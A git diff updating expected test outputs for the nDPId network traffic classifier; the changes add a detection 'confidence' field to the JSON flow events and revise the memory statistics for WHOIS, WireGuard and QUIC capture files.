+01269{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":18,"source":"whois.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1604305198454,"flow_last_seen":1604305198690,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1220,"flow_tot_l4_payload_len":1560,"flow_avg_l4_payload_len":222,"midstream":0,"ts_msec":1604305198690,"l3_proto":"ip4","src_ip":"10.17.34.139","dst_ip":"10.17.51.8","src_port":64016,"dst_port":4343,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"5f48063f9f3a827056ccdabadcc3886a","ja3s":"649d6810e8392f63dc311eecb6b7098b","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384","issuerDN":"CN=10.17.51.7","subjectDN":"CN=10.17.51.7, CN=10.17.51.7","alpn":"h2,http\/1.1","fingerprint":"DD:4E:28:9B:08:C1:D5:63:D1:B6:FC:DD:FD:91:A9:D4:E3:A8:7F:D5"}}
+00919{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":19,"source":"whois.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1604305198454,"flow_last_seen":1604305198690,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1220,"flow_tot_l4_payload_len":1560,"flow_avg_l4_payload_len":222,"midstream":0,"ts_msec":1623517268690,"l3_proto":"ip4","src_ip":"10.17.34.139","dst_ip":"10.17.51.8","src_port":64016,"dst_port":4343,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}}
 00568{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":19,"source":"whois.pcapng","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1623517268690,"flow_last_seen":1623517268690,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1623517268690,"l3_proto":"ip4","src_ip":"192.30.45.30","dst_ip":"10.160.63.128","src_port":43,"dst_port":53217,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"whois.pcapng","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1623517268690,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":62,"pkt_l4_len":24,"ts_msec":1623517268690,"pkt":"AAAAAAAAAAsAAAAIgQAHdAgARQAALKUxAAAtBrE+wB4tHgqgP4AAK8\/hR0rdvNStq\/tgEgW05awAAAIEBVA="}
 02057{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"whois.pcapng","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1623517269021,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1258,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":1258,"pkt_l4_len":1220,"ts_msec":1623517269021,"pkt":"AAAAAAAAAAsAAAAIgQAHdAgARQAE2B35AAAtBjPLwB4tHgqgP4AAK8\/hR0rdvdStrBVQGAW0T9cAACAgIERvbWFpbiBOYW1lOiBDWUJFUlBBVFJPTEJELkNPTQ0KICAgUmVnaXN0cnkgRG9tYWluIElEOiAyMTUzNDAwMTAwX0RPTUFJTl9DT00tVlJTTg0KICAgUmVnaXN0cmFyIFdIT0lTIFNlcnZlcjogd2hvaXMuUHVibGljRG9tYWluUmVnaXN0cnkuY29tDQogICBSZWdpc3RyYXIgVVJMOiBodHRwOi8vd3d3LnB1YmxpY2RvbWFpbnJlZ2lzdHJ5LmNvbQ0KICAgVXBkYXRlZCBEYXRlOiAyMDIwLTA4LTI5VDA3OjQxOjUyWg0KICAgQ3JlYXRpb24gRGF0ZTogMjAxNy0wOC0xNFQxNjoxMDo1MVoNCiAgIFJlZ2lzdHJ5IEV4cGlyeSBEYXRlOiAyMDIxLTA4LTE0VDE2OjEwOjUxWg0KICAgUmVnaXN0cmFyOiBQRFIgTHRkLiBkL2IvYSBQdWJsaWNEb21haW5SZWdpc3RyeS5jb20NCiAgIFJlZ2lzdHJhciBJQU5BIElEOiAzMDMNCiAgIFJlZ2lzdHJhciBBYnVzZSBDb250YWN0IEVtYWlsOiBhYnVzZS1jb250YWN0QHB1YmxpY2RvbWFpbnJlZ2lzdHJ5LmNvbQ0KICAgUmVnaXN0cmFyIEFidXNlIENvbnRhY3QgUGhvbmU6ICsxLjIwMTM3NzU5NTINCiAgIERvbWFpbiBTdGF0dXM6IGNsaWVudFRyYW5zZmVyUHJvaGliaXRlZCBodHRwczovL2ljYW5uLm9yZy9lcHAjY2xpZW50VHJhbnNmZXJQcm9oaWJpdGVkDQogICBOYW1lIFNlcnZlcjogTlMyNS5FSUNSQS5ORVQNCiAgIE5hbWUgU2VydmVyOiBOUzI2LkVJQ1JBLk5FVA0KICAgRE5TU0VDOiB1bnNpZ25lZA0KICAgVVJMIG9mIHRoZSBJQ0FOTiBXaG9pcyBJbmFjY3VyYWN5IENvbXBsYWludCBGb3JtOiBodHRwczovL3d3dy5pY2Fubi5vcmcvd2ljZi8NCj4+PiBMYXN0IHVwZGF0ZSBvZiB3aG9pcyBkYXRhYmFzZTogMjAyMS0wNi0xMlQxNjowMDo1NlogPDw8DQoNCkZvciBtb3JlIGluZm9ybWF0aW9uIG9uIFdob2lzIHN0YXR1cyBjb2RlcywgcGxlYXNlIHZpc2l0IGh0dHBzOi8vaWNhbm4ub3JnL2VwcA0KDQpOT1RJQ0U6IFRoZSBleHBpcmF0aW9uIGRhdGUgZGlzcGxheWVkIGluIHRoaXMgcmVjb3JkIGlzIHRoZSBkYXRlIHRoZQ0KcmVnaXN0cmFyJ3Mgc3BvbnNvcnNoaXAgb2YgdGhlIGRvbWFpbiBuYW1lIHJlZ2lzdHJhdGlvbiBpbiB0aGUgcmVnaXN0cnkgaXMNCmN1cnJlbnRseSBzZXQgdG8gZXhwaXJlLiBUaGlzIGRhdGUgZG9lcyBub3QgbmVjZXNzYXJpbHkgcmVmbGVjdCB0aGUgZXhwaXJhdGlvbg0KZGF0ZSBvZiB0aGUgZG9tYWluIG5hbWUgcmVnaXN0cmFudCdzIGFncg=="}
 02057{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"whois.pcapng","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1623517269021,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1258,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":1258,"pkt_l4_len":1220,"ts_msec":1623517269021,"pkt":"AAAAAAAAAAsAAAAIgQAHdAgARQAE2Mf8AAAtBonHwB4tHgqgP4AAK8\/hR0ribdStrBVQGAW06F4AAGVlbWVudCB3aXRoIHRoZSBzcG9uc29yaW5nDQpyZWdpc3RyYXIuICBVc2VycyBtYXkgY29uc3VsdCB0aGUgc3BvbnNvcmluZyByZWdpc3RyYXIncyBXaG9pcyBkYXRhYmFzZSB0bw0KdmlldyB0aGUgcmVnaXN0cmFyJ3MgcmVwb3J0ZWQgZGF0ZSBvZiBleHBpcmF0aW9uIGZvciB0aGlzIHJlZ2lzdHJhdGlvbi4NCg0KVEVSTVMgT0YgVVNFOiBZb3UgYXJlIG5vdCBhdXRob3JpemVkIHRvIGFjY2VzcyBvciBxdWVyeSBvdXIgV2hvaXMNCmRhdGFiYXNlIHRocm91Z2ggdGhlIHVzZSBvZiBlbGVjdHJvbmljIHByb2Nlc3NlcyB0aGF0IGFyZSBoaWdoLXZvbHVtZSBhbmQNCmF1dG9tYXRlZCBleGNlcHQgYXMgcmVhc29uYWJseSBuZWNlc3NhcnkgdG8gcmVnaXN0ZXIgZG9tYWluIG5hbWVzIG9yDQptb2RpZnkgZXhpc3RpbmcgcmVnaXN0cmF0aW9uczsgdGhlIERhdGEgaW4gVmVyaVNpZ24gR2xvYmFsIFJlZ2lzdHJ5DQpTZXJ2aWNlcycgKCJWZXJpU2lnbiIpIFdob2lzIGRhdGFiYXNlIGlzIHByb3ZpZGVkIGJ5IFZlcmlTaWduIGZvcg0KaW5mb3JtYXRpb24gcHVycG9zZXMgb25seSwgYW5kIHRvIGFzc2lzdCBwZXJzb25zIGluIG9idGFpbmluZyBpbmZvcm1hdGlvbg0KYWJvdXQgb3IgcmVsYXRlZCB0byBhIGRvbWFpbiBuYW1lIHJlZ2lzdHJhdGlvbiByZWNvcmQuIFZlcmlTaWduIGRvZXMgbm90DQpndWFyYW50ZWUgaXRzIGFjY3VyYWN5LiBCeSBzdWJtaXR0aW5nIGEgV2hvaXMgcXVlcnksIHlvdSBhZ3JlZSB0byBhYmlkZQ0KYnkgdGhlIGZvbGxvd2luZyB0ZXJtcyBvZiB1c2U6IFlvdSBhZ3JlZSB0aGF0IHlvdSBtYXkgdXNlIHRoaXMgRGF0YSBvbmx5DQpmb3IgbGF3ZnVsIHB1cnBvc2VzIGFuZCB0aGF0IHVuZGVyIG5vIGNpcmN1bXN0YW5jZXMgd2lsbCB5b3UgdXNlIHRoaXMgRGF0YQ0KdG86ICgxKSBhbGxvdywgZW5hYmxlLCBvciBvdGhlcndpc2Ugc3VwcG9ydCB0aGUgdHJhbnNtaXNzaW9uIG9mIG1hc3MNCnVuc29saWNpdGVkLCBjb21tZXJjaWFsIGFkdmVydGlzaW5nIG9yIHNvbGljaXRhdGlvbnMgdmlhIGUtbWFpbCwgdGVsZXBob25lLA0Kb3IgZmFjc2ltaWxlOyBvciAoMikgZW5hYmxlIGhpZ2ggdm9sdW1lLCBhdXRvbWF0ZWQsIGVsZWN0cm9uaWMgcHJvY2Vzc2VzDQp0aGF0IGFwcGx5IHRvIFZlcmlTaWduIChvciBpdHMgY29tcHV0ZXIgc3lzdGVtcykuIFRoZSBjb21waWxhdGlvbiwNCnJlcGFja2FnaW5nLA=="}
-00613{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":23,"source":"whois.pcapng","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1623517268690,"flow_last_seen":1623517269021,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1200,"flow_tot_l4_payload_len":3114,"flow_avg_l4_payload_len":622,"midstream":0,"ts_msec":1623517269021,"l3_proto":"ip4","src_ip":"192.30.45.30","dst_ip":"10.160.63.128","src_port":43,"dst_port":53217,"l4_proto":"tcp","ndpi": {"proto":"Whois-DAS","breed":"Acceptable","category":"Network"}}
+00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":23,"source":"whois.pcapng","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1623517268690,"flow_last_seen":1623517269021,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1200,"flow_tot_l4_payload_len":3114,"flow_avg_l4_payload_len":622,"midstream":0,"ts_msec":1623517269021,"l3_proto":"ip4","src_ip":"192.30.45.30","dst_ip":"10.160.63.128","src_port":43,"dst_port":53217,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Whois-DAS","breed":"Acceptable","category":"Network"}}
 00576{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":23,"source":"whois.pcapng","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1623517268690,"flow_last_seen":1623517269021,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1200,"flow_tot_l4_payload_len":3114,"flow_avg_l4_payload_len":622,"midstream":0,"ts_msec":1623517269021,"l3_proto":"ip4","src_ip":"192.30.45.30","dst_ip":"10.160.63.128","src_port":43,"dst_port":53217,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00156{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":23,"source":"whois.pcapng","alias":"nDPId-test","total-events-serialized":21}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
@@ -27,10 +27,10 @@
 ~~ total active/idle flows...: 3/3
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4607563 bytes
-~~ total memory freed........: 4607563 bytes
-~~ total allocations/frees...: 99589/99589
+~~ total memory allocated....: 4691860 bytes
+~~ total memory freed........: 4691860 bytes
+~~ total allocations/frees...: 101179/101179
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 161 chars
 ~~ json string max len.......: 2062 chars
-~~ json string avg len.......: 1166 chars
+~~ json string avg len.......: 1169 chars
diff --git a/test/results/wireguard.pcap.out b/test/results/wireguard.pcap.out
index 446f27874..d76d5f718 100644
--- a/test/results/wireguard.pcap.out
+++ b/test/results/wireguard.pcap.out
@@ -3,12 +3,12 @@
 01521{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"wireguard.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1563973554628,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":842,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":842,"pkt_l4_len":808,"ts_msec":1563973554628,"pkt":"OCxKuzMdABAY3q0FCABFAAM8FXkAADURYEKLosCdwKgADspsjRQDKLH1BAAAAL5AaY1rAAAAAAAAANUJ2VrXQI01RZfJr8PEwgZEhNNcu6x03VWSZ67dhAHHTWKcRpBFkk8NVHd\/C4D4pz\/puWqoUUxKuxxH6YlcxuxAvZFB0Na5O4CW6jEyMIx3UMKSHboRTInUKfs0ifRWz\/ah3LYVezBxxWAse8HA4hp9J+12MZT8TmyygIwyCCaeEvoUQjFc6leSZrAZpKnPNseLUtXq9seSkA+QHufBd5P\/nAxkid4Fwq057VLJqJcJvFJRIdSNrsUBNHlMd2O226LQDMo6+sXnZNRhM\/0lY6T99lZ2rtutA5g+LROCm\/BZLu+Ww0aOhZ9T5CPKvl1MXzbqDpHjEWohQohUG62HCabsLz2Pl6HJpafmxv\/xXmUvqTxvWO5iYVSI4YH0rzZVN3aVdPUxgXYG+W8rSU+st0bg\/OnAMZWFzotivj2mfqRsGMWV3egRFwhvlfe7Fuv0OvGM3s9ZvinFAlmQZqUDOt74G5zoedU\/69v6LWqjWqMgwmKLQ\/lMwt2MnS6hiTwk\/iqPpTIM8RYnxG13RvjKDr4JXT\/U7OnZL63BA8kKbkL5zeTL+gL4bvPs8T4bLqWJpX+KPgKK5qcCbrRIXtRaFjvffCmBHmxiams\/n7B6m2DssFWcjX1Ev1oBu1UMKN6t2aeneW6ZYl4Q+afpKmmTZbh75sYoA8rPXxM4Q6E\/CvQ8xKFJuG12US4vfj96Tg+HLqjTKQn0aT3tP\/WRrjoWHz5nOKAwY2ssdZ\/sOQ7Z4I975oMYqMkolPHC\/IQyZ00spefKrUv00QdKXcsmU90gzx2i\/XncJUiW6+cRr5y\/xIasdRDvxOeWrnEuyr4eneiO5Pi37MXP8f2E65R6K8EWKkhOt2QxypTL9OYJAB3d80dQUxikTgyJwcF9uQEqgJNA\/GZhO2rBxL\/P3ze0It5qd4umjz9rSz1Tj4x9V7iRrPWik7ncKTUF\/OLBOu3ao3EyUG8u2N+GMLh6DNMnc3AMj260R63yyZIj87BZpn+95duhzSfs8I4u6YbCy54JPpusEK7oluD\/Hy2\/DI77VPA2QYc="}
 00622{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"wireguard.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1563973554628,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":186,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":186,"pkt_l4_len":152,"ts_msec":1563973554628,"pkt":"OCxKuzMdABAY3q0FCABFAACsFXoAADURYtGLosCdwKgADspsjRQAmIUlBAAAAL5AaY1sAAAAAAAAAApaAsrtXpH1hJEWMIaMon2Jp07DYKtFnos9KJ2dxNXsnPOlMw8teGIqqtQyAhfCvZKfSoj8FKmPC1PCtu8qqniK567s\/wF6cALr5IJXHXdFnmr1I94kKjzDU62XCT24xGedWrUZRek84+e2Fsx1lJJ6NR9cFgw9VnO9J77GX8hL"}
 00558{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"wireguard.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1563973554628,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":138,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":138,"pkt_l4_len":104,"ts_msec":1563973554628,"pkt":"ABAY3q0FOCxKuzMdCABFAAB8LYcAAEARP\/TAqAAOi6LAnY0UymwAaNyeBAAAAG2mYV5wAAAAAAAAAAo35XrmOHswcilnP2QelKUcrUyMt+9zQAFDeYSUJyyw9BNkc7uq5jhjxm51P1MBuT08PEWRrzriFSk+BrqayZkHU3Oi+bUZJb76bMmarQhF"}
-00615{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"wireguard.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1563973554628,"flow_last_seen":1563973554642,"flow_idle_time":180000,"flow_min_l4_payload_len":96,"flow_max_l4_payload_len":800,"flow_tot_l4_payload_len":1312,"flow_avg_l4_payload_len":328,"midstream":0,"ts_msec":1563973554642,"l3_proto":"ip4","src_ip":"139.162.192.157","dst_ip":"192.168.0.14","src_port":51820,"dst_port":36116,"l4_proto":"udp","ndpi": {"proto":"WireGuard","breed":"Acceptable","category":"VPN"}}
-00665{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":1343,"source":"wireguard.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1342,"flow_first_seen":1563973554628,"flow_last_seen":1563973637333,"flow_idle_time":180000,"flow_min_l4_payload_len":80,"flow_max_l4_payload_len":1362,"flow_tot_l4_payload_len":402186,"flow_avg_l4_payload_len":299,"midstream":0,"ts_msec":1563973647439,"l3_proto":"ip4","src_ip":"139.162.192.157","dst_ip":"192.168.0.14","src_port":51820,"dst_port":36116,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"WireGuard","breed":"Acceptable","category":"VPN"}}
-00665{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":1654,"source":"wireguard.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1653,"flow_first_seen":1563973554628,"flow_last_seen":1563973742644,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":1362,"flow_tot_l4_payload_len":464906,"flow_avg_l4_payload_len":281,"midstream":0,"ts_msec":1563973743882,"l3_proto":"ip4","src_ip":"139.162.192.157","dst_ip":"192.168.0.14","src_port":51820,"dst_port":36116,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"WireGuard","breed":"Acceptable","category":"VPN"}}
-00665{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":1926,"source":"wireguard.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1925,"flow_first_seen":1563973554628,"flow_last_seen":1563973834593,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":1362,"flow_tot_l4_payload_len":521546,"flow_avg_l4_payload_len":270,"midstream":0,"ts_msec":1563973838270,"l3_proto":"ip4","src_ip":"139.162.192.157","dst_ip":"192.168.0.14","src_port":51820,"dst_port":36116,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"WireGuard","breed":"Acceptable","category":"VPN"}}
-00665{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2391,"source":"wireguard.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2390,"flow_first_seen":1563973554628,"flow_last_seen":1563973930443,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":1362,"flow_tot_l4_payload_len":632512,"flow_avg_l4_payload_len":264,"midstream":0,"ts_msec":1563973932111,"l3_proto":"ip4","src_ip":"139.162.192.157","dst_ip":"192.168.0.14","src_port":51820,"dst_port":36116,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"WireGuard","breed":"Acceptable","category":"VPN"}}
-00663{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2399,"source":"wireguard.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2399,"flow_first_seen":1563973554628,"flow_last_seen":1563973935842,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":1362,"flow_tot_l4_payload_len":633424,"flow_avg_l4_payload_len":264,"midstream":0,"ts_msec":1563973935842,"l3_proto":"ip4","src_ip":"139.162.192.157","dst_ip":"192.168.0.14","src_port":51820,"dst_port":36116,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"WireGuard","breed":"Acceptable","category":"VPN"}}
+00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"wireguard.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1563973554628,"flow_last_seen":1563973554642,"flow_idle_time":180000,"flow_min_l4_payload_len":96,"flow_max_l4_payload_len":800,"flow_tot_l4_payload_len":1312,"flow_avg_l4_payload_len":328,"midstream":0,"ts_msec":1563973554642,"l3_proto":"ip4","src_ip":"139.162.192.157","dst_ip":"192.168.0.14","src_port":51820,"dst_port":36116,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"WireGuard","breed":"Acceptable","category":"VPN"}}
+00691{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":1343,"source":"wireguard.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1342,"flow_first_seen":1563973554628,"flow_last_seen":1563973637333,"flow_idle_time":180000,"flow_min_l4_payload_len":80,"flow_max_l4_payload_len":1362,"flow_tot_l4_payload_len":402186,"flow_avg_l4_payload_len":299,"midstream":0,"ts_msec":1563973647439,"l3_proto":"ip4","src_ip":"139.162.192.157","dst_ip":"192.168.0.14","src_port":51820,"dst_port":36116,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WireGuard","breed":"Acceptable","category":"VPN"}}
+00691{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":1654,"source":"wireguard.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1653,"flow_first_seen":1563973554628,"flow_last_seen":1563973742644,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":1362,"flow_tot_l4_payload_len":464906,"flow_avg_l4_payload_len":281,"midstream":0,"ts_msec":1563973743882,"l3_proto":"ip4","src_ip":"139.162.192.157","dst_ip":"192.168.0.14","src_port":51820,"dst_port":36116,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WireGuard","breed":"Acceptable","category":"VPN"}}
+00691{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":1926,"source":"wireguard.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1925,"flow_first_seen":1563973554628,"flow_last_seen":1563973834593,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":1362,"flow_tot_l4_payload_len":521546,"flow_avg_l4_payload_len":270,"midstream":0,"ts_msec":1563973838270,"l3_proto":"ip4","src_ip":"139.162.192.157","dst_ip":"192.168.0.14","src_port":51820,"dst_port":36116,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WireGuard","breed":"Acceptable","category":"VPN"}}
+00691{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2391,"source":"wireguard.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2390,"flow_first_seen":1563973554628,"flow_last_seen":1563973930443,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":1362,"flow_tot_l4_payload_len":632512,"flow_avg_l4_payload_len":264,"midstream":0,"ts_msec":1563973932111,"l3_proto":"ip4","src_ip":"139.162.192.157","dst_ip":"192.168.0.14","src_port":51820,"dst_port":36116,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WireGuard","breed":"Acceptable","category":"VPN"}}
+00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2399,"source":"wireguard.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2399,"flow_first_seen":1563973554628,"flow_last_seen":1563973935842,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":1362,"flow_tot_l4_payload_len":633424,"flow_avg_l4_payload_len":264,"midstream":0,"ts_msec":1563973935842,"l3_proto":"ip4","src_ip":"139.162.192.157","dst_ip":"192.168.0.14","src_port":51820,"dst_port":36116,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WireGuard","breed":"Acceptable","category":"VPN"}}
 00160{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":2399,"source":"wireguard.pcap","alias":"nDPId-test","total-events-serialized":12}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
 ~~ packets captured/processed: 2399/2399
@@ -18,9 +18,9 @@
 ~~ total active/idle flows...: 1/1
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4664400 bytes
-~~ total memory freed........: 4664400 bytes
-~~ total allocations/frees...: 101952/101952
+~~ total memory allocated....: 4749353 bytes
+~~ total memory freed........: 4749353 bytes
+~~ total allocations/frees...: 103542/103542
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 165 chars
 ~~ json string max len.......: 1526 chars
diff --git a/test/results/youtube_quic.pcap.out b/test/results/youtube_quic.pcap.out
index 8a658d56d..83d876e32 100644
--- a/test/results/youtube_quic.pcap.out
+++ b/test/results/youtube_quic.pcap.out
@@ -1,22 +1,22 @@
 00444{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"youtube_quic.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32}
 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"youtube_quic.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1489363823466,"flow_last_seen":1489363823466,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1489363823466,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"216.58.205.66","src_port":54997,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
